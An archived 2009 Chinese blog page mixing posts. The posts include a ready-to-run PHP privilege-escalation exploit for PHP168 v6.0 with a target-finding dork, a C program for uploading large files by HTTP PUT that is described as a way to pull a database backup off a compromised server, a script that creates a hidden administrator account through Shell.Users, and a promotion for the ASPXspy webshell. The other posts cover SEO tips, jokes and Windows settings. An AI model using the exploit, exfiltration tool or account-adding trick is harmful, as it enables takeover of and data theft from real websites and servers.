Php168 v6 权限提升漏洞

2009年7月21日 没有评论 79 views

 

by Ryat
http://www.wolvez.org
2009-07-17

天天上班,好久没在论坛发贴了...

以前发过一个php168 v2008的权限提升漏洞,这次的漏洞也出在相同的代码段
直接给出exp,里面的一些细节还是有些意思的,有兴趣的同学可以自行分析:)

EXP:

#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
Php168 v6.0 update user access exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PHP168 V6.0"
+---------------------------------------------------------------------------+
');
/**
* works regardless of php.ini settings
*/
if ($argc < 5) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path user pass
host:      target server (ip/hostname)
path:      path to php168
user:      login username
pass:      login password
Example:
php '.$argv[0].' localhost /php168/ ryat 123456
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];

$resp = send();
preg_match('/Set-Cookie:\s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/', $resp, $cookie);

if ($cookie)
    if (strpos(send(), 'puret_t') !== false)
        exit("Expoilt Success!\nYou Are Admin Now!\n");
    else
        exit("Exploit Failed!\n");
else
    exit("Exploit Failed!\n");

function rands($length = 8)
{
    $hash = '';
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
    $max = strlen($chars) - 1;
    mt_srand((double)microtime() * 1000000);
    for ($i = 0; $i < $length; $i++)
        $hash .= $chars[mt_rand(0, $max)];

    return $hash;
}

function send()
{
    global $host, $path, $user, $pass, $cookie;

    if ($cookie) {
        $cookie[1] .= ';USR='.rands()."\t31\t\t";
        $cmd = 'memberlevel[8]=1&memberlevel[9]=1&memberlevel[3,introduce%3D0x70757265745f74]=-1';

        $message = "POST ".$path."member/homepage.php?uid=$cookie[2]  HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n";
        $message .= "Cookie: ".$cookie[1]."\r\n\r\n";
        $message .= $cmd;
    } else {
        $cmd = "username=$user&password=$pass&step=2";

        $message = "POST ".$path."do/login.php  HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n\r\n";
        $message .= $cmd;
    }

    $fp = fsockopen($host, 80);
    fputs($fp, $message);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>

分类: 技术文章 标签:

鲜果认领

2009年7月21日 没有评论 324 views

BANG5B1341E989FB9314F36771BAXIANGUO

分类: 影音娱乐 标签:

松岛枫、武藤兰电影全集 BT 下载

2009年7月21日 5 条评论 73,563 views

请注意本文完全出于 SEO 不喜欢的可以略过!同时也是本站的第一个 SEO 实验,稍后我会在文章中透露实验的结果。各位不要想歪了哈。

之所以选择松岛枫和武藤兰这两个关键词,是我在 Google 趋势上经过仔细思分析后的结果,用了一个小时的时间最终从众多日本 AV 女优中选出了在中国搜索量前五位的 AV 明星:武藤兰、松岛枫、小泽玛利亚、苍井空和爱田由。
武藤兰虽然趋势指数很高,但是从上图中可以看出关键词的流行度正在走下坡路,而松岛枫在韩寒事件的推动下在中国的人气不断攀升。

标题的选择对于 SEO 来说非常重要,通常热度高的关键词不容易做出排名,所以我决定避其锋芒,选择类似松岛枫全集 BT 下载、武藤兰电影 BT 下载之类的扩展关键词,于是就有了“松岛枫、武藤兰电影全集 BT 下载”这样的标题。

关键词的密度当然也要控制在合理的水平,经过我周密的统计,本文的主要关键词密度都控制在合理的范围之内:武藤兰和松岛枫的密度均为1.5%左右。

剩下的就是 Meta 标签的写法,由于搜索引擎对 Keywords 标签已经不是非常之感冒,所以这个标签我只写下了:日本 AV 女优、松岛枫全集 BT 下载

分类: 技术文章 标签: , ,

vs2003到2008各版本

2009年7月20日 没有评论 167 views

vs2003到2008各版本如下:

vs.net2003

Visual Studio .NET 2003 Enterprise Architect

Visual Studio .NET 2003 Enterprise Developer

Visual Studio .NET 2003 Professional

VS2005

Visual Studio 2005 Professional

Visual Studio 2005 Standard

Visual Studio 2005 Team Edition for Database Professionals

Visual Studio 2005 Team Edition for Software Architects

Visual Studio 2005 Team Edition for Software Developers

Visual Studio 2005 Team Edition for Software Testers

Visual Studio 2005 Team Suite

VS2008

Visual Studio 2008 Express Editions

Visual Studio 2008 Professional Edition

Visual Studio 2008 Standard Edition

Visual Studio Team System 2008 Architecture Edition

Visual Studio Team System 2008 Database Edition

Visual Studio Team System 2008 Development Edition

Visual Studio Team System 2008 Team Suite

Visual Studio Team System 2008 Test Edition

Visual Studio Team System 2008 Test Load Agent

分类: 技术文章 标签:

春哥教(转)

2009年7月20日 没有评论 58 views

我个人很喜欢这种网络亚文化现象,当网络越来越主流的时候,这种不断生灭的亚文化形态就显得分外迷人。此前,Mop上就出现过围绕猥琐男的PS而产生的猥琐神教,在天涯也出现过针对郭敬明的菊花教。和以往明显带有不屑和嘲弄的态度不同,春哥教所包含的情感更为复杂有趣。

中国人喜欢两分法,好或者坏,喜欢或者不喜欢。严格说来,会有喜欢、无所谓、讨厌三种判断。人们的情绪和判断是按照这个线性序列变化和排列的。但是,这种单线式的情感在春哥教的问题上遭遇了挑战。成为春哥教众的人,并非是讨厌,也非喜欢李宇春。他们真正喜欢的,是“春哥”这个概念。春哥和李宇春关系其实并不大,而是从李宇春出发,大家集体无意识地创造出了一个新人“春哥”。这个人有以下特质:


很Man
眼神霸气
神力无敌
可以粉碎一切反对的力量。

从这里开始,衍生出一系列演义故事:

1、若问春哥多强壮?伸直双臂过火车十九练竞速,追随火箭跑。二十进男足,断子绝孙脚。春哥上场皆畏缩,巴西德国俱投降。若问爷们力多大?一呼一吸龙卷风三十学瞳术,虐杀写轮眼。四十喜背书,大英图书馆。宇春挥手造宇宙,万物俯首拜英雄。

2、春哥纯爷们,铁血真汉子。一岁能杀鸡,三岁造飞机。五岁开坦克,六岁穿铁衣。四境百里传春哥,人人闻风而丧胆。若问汉子谁能敌?个个摆手面色惊十岁练武打,十二会做法。十五懂发电,眨眼数百瓦。浑身肌肉展雄姿,意气风发震四海。

3、春哥纯爷们,铁血真汉子,人民好兄弟,父亲好儿子,拳上能站人,命根能走马,胸口碎大石,菊花开瓶盖,一年硬两次,一次整半年,三秒一勃起,一分两炮精,敢干芙蓉女,能爆棒子菊,胯下草泥马,手中达菲鸡,爆菊不眨眼,中出不喘息,整晚整晚日,全天全天射。

分析这些内容,你很难说网友对春哥是喜欢还是讨厌。他们的态度更像是从喜欢到无所谓的中点,随时往返跃迁与从无所谓到讨厌的中点。同时把几种完全风马牛不相及的情绪揉合在一起,通过春哥教的崇拜方式来表达出来。因此,也就有了各种“祷告”形势:

1、信春哥,得永生。
2、信春哥,不挂科。
3、信春哥,上本科;卸绿坝,上北大。
4、新春哥,死后原地满血复活。
5、昨天我还不信春哥,今天我信了,真的就。。。。。。。(具体事例)

可以看出,春哥教要比二十年前的“无厘头”更为无厘头,发展的线索更为微妙曲折。借用春哥这个概念,人们可以表达不满,也可以表达对生活的感激。可以演变为虔敬的心态,但是又同时能保持高度的嘲弄。昨天晚上,根据这段时间我对春哥教的认知,我也编写了一段主祷词:

信春哥,得永生!感谢春哥赐予我Google,愿她的名字行在网上,如同行在地上一样。每日的网站,你赐予我。免我的费,如同我们免别人的费。不叫我们遇见五毛。救我们脱离GFW。因为国度、权柄、荣耀,全是你的,直到永远!阿门!

春哥教这个概念我觉得很不错,准备用上一个时期。李宇春的粉丝也许会觉得不爽,不过,春哥教真的和你们的偶像没有多少关系。你们觉得春哥教是对李宇春的小恶意,小讽刺。而事实是,你们的李宇春只是春哥教的一个小注脚,别把自己太当回事了。

信春哥,得永生,股票今天真的赚了。

分类: 影音娱乐 标签:

彻底关闭445端口

2009年7月20日 没有评论 71 views

关闭

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]
"TransportBindName"=""

打开

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]
"TransportBindName"="\\Device\\"

重启生效

分类: 技术文章 标签:

Editplus的一个正则

2009年7月18日 没有评论 61 views

搜索 url(.+\/([0-9a-z]+)\.(jpg|png|gif))\)
替换成 url(images/\2.\3)
就是把类似 url(http://image.chinahtml.com/images/icon.gif) 替换成 url(images/icon.gif)

分类: 技术文章 标签:

能让你笑到肚疼的最新恶搞QQ签名!继续雷人……

2009年7月18日 没有评论 76 views

1、执子之手,方知子丑,泪流满面,子不走我走。

  2、西游记告诉我们:凡是有后台的妖怪都被接走了,凡是没后台的都被一棒子打死了。

  3、你有什么不开心的事?说出来让大家开心一下。

  4、我那么喜欢你,你喜欢我一下会死啊。

  5、我又不是人民币,怎么能让人人都喜欢我?!

  6、令人不能自拔的,除了牙齿还有爱情。

  7、当生活心怀歹毒地将一切都搞成了黑色幽默,我顺水推舟把自己变成了一个受过高等教育的流氓。

  8、时间太瘦,指缝太宽。

  9、小姑娘们梦中都想找一匹白马,睁开眼发现满世界都是灰不溜秋的驴,悲痛欲绝后,只能从驴群中挑个身强力壮的,这样的驴就被命名为:经济适用男 。

  10、我就要哭,我就要闹,一宿一宿不睡觉,手里拿瓶安眠药,拿根小绳要上吊。再丑也要谈恋爱,谈到世界充满爱。

  11、我们的目标:向钱看,向厚赚。

  12、我是你转身就忘的路人甲,凭什么陪你蹉跎年华到天涯?

  13、没有医保和寿险的,天黑后不要见义勇为……

  14、挤公交是包含散打、瑜珈、柔道、平衡木等多种体育和健身项目于一体的综合性运动。

  15、老娘法眼一开就知道你是个妖孽了。

  16、手插口袋,谁都不爱 。

  17、手拿菜刀砍电线,一路火花带闪电。

  18、单身并不难,难的是应付那些千方百计想让你结束单身的人 。

  19、幸福是什么?幸福就是你吃鱼,我吃肉,看着别人啃骨头。

  20、念了十几年书,想起来还是幼儿园比较好混!

  21、我当年也是个痴情的种子,结果下了场雨……淹死了。

  22、很多人说婚姻是爱情的坟墓,但是能够入土为安的爱情总比暴尸街头要好 。

  23、有空学风水去,死后占个好墓也算弥补了生前买不起好房的遗憾

  24、据说,人只有两个选择,忙着死或是忙着活,我想我有了第三种选择:忙着等死 。

  25、春困夏乏秋无力,冬日正好眠。

  26、思念不能自已,痛苦不能自理,结果不能自取,幸福不能自予。

  27、小时候我以为自己长大后可以拯救整个世界,等长大后才发现整个世界都拯救不了我。

  28、如果你注定不能给予我期待的回应.那么就保持在安全距离之外吧。

  29、请不要把我对你的容忍,当成你不要脸的资本。

  30、女子无才便是德,我一定是太缺德了。

  31、诸葛亮出山前也没带过兵啊,你们凭啥要我有工作经验。

  32、用嘻哈的蓝调精神来过二胡一样的生活。

  33、鸵鸟的幸福,只是一堆沙子。

  34、老天,太蓝!大海,太咸!人生,太难!工作,太烦!和你,有缘!想你,失眠!见你,太远!

  35、一觉醒来,天都黑了。

  36、喝药递瓶,上吊给绳,跳楼的挥着小手绢送行。

  37、铁杵能磨成针,但木杵只能磨成牙签,材料不对,再努力也没用。

  38、你要搞清楚自己人生的剧本——不是你父母的续集,不是你子女的前传,更不是你朋友的外篇。

  39、树愈静而风不止,我愈恋而他不在。

  40、多想某天醒来睁开眼,发现自己坐在小学教室的课桌椅上。老师掷来的粉笔头正好打在额头上。

  41、少年不胡作妄为,大胆放肆,试问老年时哪来的题材话当年。

  42、作为一个怪兽,我的愿望是至少消灭一个奥特曼。

  43、再过几十年 我们来相会 送到火葬场 全部烧成灰 你一堆我一堆 谁也不认识谁 全部送到农村做化肥~

  44、学问之美,在于使人一头雾水;诗歌之美,在于煽动男女出轨;女人之美,在于蠢得无怨无悔;男人之美,在于说谎说得白日见鬼。

  45、我以为我很颓废,今天我才知道,原来我早报废了。

  46、不成熟男人的标志是可以为了理想壮烈的牺牲,成熟男人的标志的可以为了理想卑贱的活着。

  47、生活就像宋祖德的嘴,你永远都不知道下一个倒霉的会是谁。

  48、阳光温热,岁月静好,你还不来,我怎敢老去?

  49、人又不聪明,还学别人秃顶。

  50、我以神的姿态,闪耀在这美的瞬间.凡人勿扰…

  51、年轻的时候,我们常常冲着镜子做鬼脸;年老的时候,镜子算是扯平了。

  52、要努力!!为了你的奥迪我的迪奥。

  53、我是白领:今天领了薪水,交了房租水电,买了油米泡面,摸了口袋,感叹一声,这个月工资又白领了…

  54、执子之手,将子拖走。子说不走,好吧,关门放狗!

  55、生活,就是这样.永远占领着绝对领导的位置,当无数的傻子高呼着自己控制了生活,掌握了命运.却没看到,生活在更高的苍穹上.露出讥笑的嘲讽的面孔。

  56、他就是一盆水,倒入你的米堆里,若干年后,清水变成了醇香的酒,而你变成了一堆废弃的烂米,不是没用了,还可以拿来喂猪的。

  57、不愿做奴隶的人民,愿做人民币的奴隶。

  58、我不是天桥上算命的,唠不出那么多你爱听的磕。

  59、生活二字二几十年来回味得我大小脑抽搐,脊髓痉挛。始终不得要领。

  60、真的猛士,敢于直面自己未化妆的脸。

  61、天山童姥——外表正太,内心却有三百六十五道裂痕,每道裂痕上书春夏秋冬四字,沧桑到妖。

  62、世事往往如此,想回头也已经来不及,即使你肯沦为劣马,不一定有回头草在等着你。

  63、曾经我们都以为自己可以为爱情死,其实爱情死不了人,它只会在最疼的地方扎上一针,然后我们欲哭无泪,我们辗转反侧,我们久病成医,我们百炼成钢。你不是风儿,我也不是沙,再缠绵也到不了天涯,擦干了泪,明天早上,我们都要上班。

  64、曾经和朋友一起仰望星空,随之我们泪流满面,他是因为失恋,我则是因为扭伤了脖子。

  65、其实你我都一样,人人都在装,关键是要装像了,装圆了,有一个门槛,装成了就迈进去,成为传说中的性情中人,没装好,就卡在那里了。就是卡门。

分类: 影音娱乐 标签:

命令行下的PUT方式上传大文件

2009年7月18日 没有评论 76 views

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

注:文章首发I.S.T.O信息安全团队,后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有,转载需注明作者。
最近做一个渗透,目标机为一台数据库服务器,对外没有开放,只能反连出来,上面有个100多M的数据库备份,用后门下载的时候总是掉线,听mickey说用PUT方式可以上传大文件,于是从网上找找了代码,写了个命令行下上传大文件的C程序.

代码:

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <wininet.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "wininet.lib")

void Usage (char *name);//帮助信息

BOOL UseHttpSendReqEx(HINTERNET hConnect, TCHAR *upFile, TCHAR *localFile)
{
INTERNET_BUFFERS BufferIn = {0};
DWORD dwBytesRead;
DWORD dwBytesWritten;
BYTE pBuffer[302480]; // Read from file in 300M chunks,最大支持300M文件

BOOL bRead, bRet;

BufferIn.dwStructSize = sizeof( INTERNET_BUFFERS );
//使用put方式上传文件:
HINTERNET hRequest = HttpOpenRequest (hConnect, "PUT",
localFile, NULL, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, 0);
if (!hRequest)
{
printf("Failed to open request handle: %lu\n", GetLastError ());
return FALSE;
}

//打开指定的文件:
HANDLE hFile = CreateFile (upFile, GENERIC_READ, FILE_SHARE_READ,
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
printf("\nFailed to open local file %s.", upFile);
return FALSE;
}

BufferIn.dwBufferTotal = GetFileSize (hFile, NULL);
printf ("File size is %d\n", BufferIn.dwBufferTotal );

if(!HttpSendRequestEx( hRequest, &BufferIn, NULL, HSR_INITIATE, 0))
{
printf( "Error on HttpSendRequestEx %lu\n",GetLastError() );
return FALSE;
}

DWORD sum = 0;
do
{
if  (!(bRead = ReadFile (hFile, pBuffer, sizeof(pBuffer),&dwBytesRead, NULL)))
{
printf ("\nReadFile failed on buffer %lu.",GetLastError());
break;
}
if (!(bRet=InternetWriteFile( hRequest, pBuffer, dwBytesRead,&dwBytesWritten)))
{
printf ("\nInternetWriteFile failed %lu", GetLastError());
break;
}
sum += dwBytesWritten;
}
while (dwBytesRead == sizeof(pBuffer)) ;

CloseHandle (hFile);
printf ("Actual written bytes: %d\nupload %s successed!\n", sum,localFile);

//结束一个HTTP请求:
if(!HttpEndRequest(hRequest, NULL, 0, 0))
{
printf( "Error on HttpEndRequest %lu \n", GetLastError());
return FALSE;
}
return TRUE;
}

int main(int argc, char **argv)

{
//put 127.0.0.1 /1.db c:\\wmpub\\1.exe
if(argc!=4)
{
Usage(argv[0]);
return 0;
}

//char *ServerName="127.0.0.1"; //这里填写URL地址
char *ServerName=argv[1];

HINTERNET hSession = InternetOpen("HttpSendRequest",INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0); //同步方式
if(!hSession){
printf("Failed to open InternetOpen\n");
exit(0);
}
//连接到一个http服务:
HINTERNET hConnect = InternetConnect(hSession,
ServerName,
INTERNET_DEFAULT_HTTP_PORT, //连接到80端口,可以修改成任意端口,比如53
NULL,
NULL,
INTERNET_SERVICE_HTTP, //服务类型HTTP,FTP或Gopher
0,
1);

if(!hConnect)
{
printf("error InternetConnect\n");
return 0;
}

//TCHAR *putfile="c:\\wmpub\\1.exe"; //上传的程序
TCHAR *putfile=argv[3];
TCHAR *putlocalfile=argv[2];
BOOL sigh;
sigh=UseHttpSendReqEx(hConnect,putfile,putlocalfile);
if(!sigh)
{
printf("error UseHttpSendReqEx\n");
return 0;
}

return 0;
}

//输出帮助的典型方法:
void Usage (char *name)
{
fprintf(stderr,"===============================================================================\n"
"\t名称:利用PUT上传300M的大文件\n"
"\t环境:Win2003+Visual C++ 6.0\n"
"\t作者:pt007@vip.sina.com\n"
"\tQQ:  7491805\n"
"\t声明:本软件由pt007原创,转载请注明出处,谢谢!\n"
"\t使用说明:1.db为上传后保存后的文件,c:\\wmpub\\1.exe为本地要上传的大文件,\n\t需要IIS里面设置允许写入!\n"
"\t例子:%s 192.168.1.101 /1.db c:\\wmpub\\1.exe\n"
"===============================================================================\n",name);
}

分类: 技术文章 标签:

百度(baidu)和谷歌(google)的更新日期和时间规律

2009年7月16日 没有评论 85 views

作为一名网站站长,来自搜索引擎的流量已经是网站流量的一个重要组成部分,因此对搜索引擎更新特别关注,总是希望自己的网站在百度收录越来越多,天天site,现在我来告诉你百度的大致更新时间,省去你天天site的麻烦,多点时间去提高下网站质量,呵呵。

原文链接http://bbs.chinaz.com/Club/thread-1304539-1-1.html

  据统计:百度收录的大更新时间是每月11号和26号,特别是26号,更新幅度最大,K站也是最多的。

  小更新时间:每周四。更新时刻都在凌晨4点。一般凌晨4点更新,也有在早上九点以后更新的。对网站流量都没啥影响,只有到中午的时候,百度对网站的关键字搜索进行重新调整之后,才会有流量上的大的变化。自然流量有增自然有降,自然现象嘛。呵呵,个人站长可以注意下百度。更新时间! 根据最新观察分析百度更新时间大致为:一个月2次!

  google更新时间:

  预测: 收录时间:更新后第1天;更新时间 :每七天更新一次(排名影响小) ;大更新时间:每月更新一次(排名影响大) ,PR数值更新3个月更新完一次(9月20日更新过以此类推),因为存在不同服务器更新总时间为一星期 。GOOGLE有两种爬虫一种是收录爬虫,此爬虫是专门收录网站用的,还有一种是增加排名的爬虫,此爬虫是综合计算反响连接用的爬虫,并且对排名的稳定和位置很重要。 所以有的新站,在刚收录的时候排名不是很好就是很差,这是因为第一个爬虫的原因,但是网站掉了不要着急,真正排站要在三个月后第二个爬虫来的时候来会生效。 还有就是GOOGLE谷歌研究者们发现了一个很简单的办法,就是查看GOOGLE的几个镜像站点是否相同,因为在GOOGLE更新期间,他总是将www2.google.com或者www3.google.com作为更新测试站点,在这期间,后两个站点中索引的页面数量和主站点将会不同。比如当我们www.google.com www2.google.com www3.google.com 还有就是一种情况: 三个网站搜索同一个关键词,得到的结果的数量不相同,这就说明GOOGLE正在更新。 GOOGLE这种大规模的更新在国外被称为GOOGLE DANCE(狗狗跳舞),有一个专门协助我们检查他是否正在跳舞的网站 http://www.google-dance-tool.com这个网站提供一个工具,通过这个工具,我们只需要输入一个关键词然后点击一个按钮,就可以看到GOOGLE三个镜像站点的搜索结果,很方便我们对比。

  PR数值更新3个月更新完一次。

  雅虎更新:雅虎的每天更新时间是早上6:00-7:00,一般搜索你网站的网址发现收录比前一天减少之后,在过30分钟就会发现收录增多了。大概一到两个月左右更新一次,动静比较大。雅虎收录:一般时间是1个月左右,但是如果你的站架构好,代码符合w3c并且内容原创的话10天内肯定就会被收录,同google。

  下面向大家介绍一下新站在怎样适当时候登陆容易被收录。

  1 百度新站登陆技巧

  一般网上都说去比较大型的论坛和百度帖吧发帖时带上新站的链接,网站很快被收录,但是我没有这么做,我有一个站是在头天下午5点多时手工提交的,第2天一site: www.weiwe.cn 就发现被百度收录了,凑巧的是我以前的一个站也是在这个时间段提交的,并且收录的时间也很快。

  2 百度文章收录技巧
  看到很多朋友都因网站文章不被收录而苦脑,但是我却不为这个发愁,因为我当天发布的文章很快就能被百度收录,在这里告诉大家一个技巧,我不知道是不是百度在早上8:00-9:00这个时间段更新自己的数据库,但是我每天早上去公司在这个时间段所更新的文章都能被百度很快收录。

  3 Google新站登陆技巧

  技巧谈不上,因为我没有怎么关心过Google,因为它真的没有给我带来什么IP流量,可能时因为我的PR值低的原因吧,把我的文章全部都放在“补充材料”里去了,所以没有什么流量,但是我同样的时间段提交给Google收录的时间要比百度晚两天,可能是呀在美国的原因吧。

  4 Google文章收录技巧
  Google的更新时间一般在下午的2:00-3:00之间,因为具我观察在这个时间段所发布的文章也能被Google很快的收录,并且Google很爽快,它要不收你就不收你,一旦收录就是上百上千的收录。并且google adsense也是在3:00-4:00这个时间进行更新,主要是因为美国佬们这时该起床上班了。

分类: 技术文章 标签: ,

命令行下一种新的加帐号的方法

2009年7月15日 没有评论 71 views

作者:lcx

今天研究了一下用户控制面板文件nusrmgr.cpl,发现调用的是Shell.Users来加用户,它还同时调用了 wscript.shell、Shell.Application、Shell.LocalMachine这三个组件。不过加用户的话,这一个 Shell.Users就足够了。那么可能在删掉了net.exe和不用adsi之外,这也可能是一种新的加用户的方法。代码如下:

js:

var o=new ActiveXObject( "Shell.Users" );
z=o.create("test") ;
z.changePassword("123456","")
z.setting("AccountType")=3;

vbs:

Set  o=CreateObject( "Shell.Users" )
Set z=o.create("test")
z.changePassword "123456",""
z.setting("AccountType")=3
分类: 技术文章 标签:

ASPXspy 2.0

2009年7月15日 没有评论 305 views

作者:Bin

1.开发环境VS2008 + C#,兼容FrameWork1.1/2.0,基本实现代码分离,CSS方便参考了phpspy。
2.密码为32位MD5加密(小写) 默认为 admin.
3.全部采用POST方式提交数据,增强了隐蔽性。
4.增强了IIS探测功能,遍历IIS站点信息,绝对路径,多域名绑定,以及IIS账号密码。
5.增加了对指定文件的搜索功能。
6.修正了一些数据库操作的BUG。
7.增强了对注册表的读取,此部分由BloodSword完成,在此感谢。
8.修正了对端口的多线程扫描
9.增强了端口转发功能,参考了Cnqing的一些代码,在此感谢。

免责声明:此工具为安全检测工具,任何人使用此工具,做违法国家法律的事情,责任自负!
联系方式:E-mail:master@rootkit.net.cn Blog:www.rootkit.net.cn

下载地址:ASPXspy2.rar

分类: 资源共享 标签: